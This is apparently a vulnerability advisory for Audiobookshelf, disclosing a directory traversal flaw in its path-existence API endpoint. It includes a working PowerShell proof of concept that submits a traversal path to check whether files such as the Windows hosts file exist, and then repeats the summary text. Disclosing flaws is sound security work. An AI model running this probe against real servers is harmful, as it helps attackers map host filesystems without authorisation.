Summary
Directory traversal in POST /api/filesystem/pathexists lets any authenticated user with canUpload = true probe for the existence of any file on the host OS
PoC
Provide your bearer token, modify directory to probe and FolderPath to the root of your library
Powershell
$HostURL = 'http://192.168.x.xx' # Audiobookshelf base URL
$Token = '<valid_bearer_token>' # Your bearer token
$Directory = '..\\..\\Windows\\System32\\drivers\\etc\\hosts' # Target file to probe
$FolderPath = 'C:/AudioBooks' # Any valid library root
$Body = @{
directory = $Directory
folderPath = $FolderPath
} | ConvertTo-Json
$Headers = @{
'Authorization' = "Bearer $Token"
'Content-Type' = 'application/json'
}
$response = Invoke-RestMethod -Method Post `
-Uri "$HostURL/audiobookshelf/api/filesystem/pathexists" `
-Headers $Headers -Body $Body
$response | ConvertTo-Json
Impact
Authenticated attackers can map the filesystem, confirm presence of sensitive files
Foyerr Reporter
Summary
Directory traversal in POST /api/filesystem/pathexists lets any authenticated user with canUpload = true probe for the existence of any file on the host OS
PoC
Provide your bearer token, modify directory to probe and FolderPath to the root of your library
Powershell
Impact
Authenticated attackers can map the filesystem, confirm presence of sensitive files